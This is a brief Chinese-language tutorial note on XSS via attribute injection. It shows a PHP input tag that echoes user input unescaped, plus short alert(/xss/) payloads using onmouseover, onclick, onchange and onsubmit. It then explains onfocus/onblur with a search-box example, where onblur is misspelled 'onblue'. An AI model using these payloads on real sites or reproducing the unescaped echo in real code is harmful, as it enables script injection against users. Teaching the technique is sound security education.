Input

<input style='text' name='test' value='<?php echo $input ?>'>

input标签中如果带有value,可尝试使用事件构造XSS语句 如:

' onmouseover='alert(/xss/)

相当于

<input style='text' name='test' value='' onmouseover='alert(/xss/)'>

可以使用的还有

'onclick='alert(/xss/)
'onchange='alert(/xss/)
'onsubmit='alert(/xss/)


onfocus是得到焦点, onblue是失去焦点, 比如我们最常用的文本搜索框,通常我们都会有个默认提示“请输入搜索关键字”,这时就能用到这俩事件了,得到焦点的时候吧“请输入搜索关键字”清空,失去焦点在默认显示“请输入搜索关键字”【当然这个是你没有输入关键字的时候】如下:

<input type="text" value="请输入搜索关键字" onfocus="if(this.value=='请输入搜索关键字') this.value=''" onblue="if(this.value=='') this.value='请输入搜索关键字'" />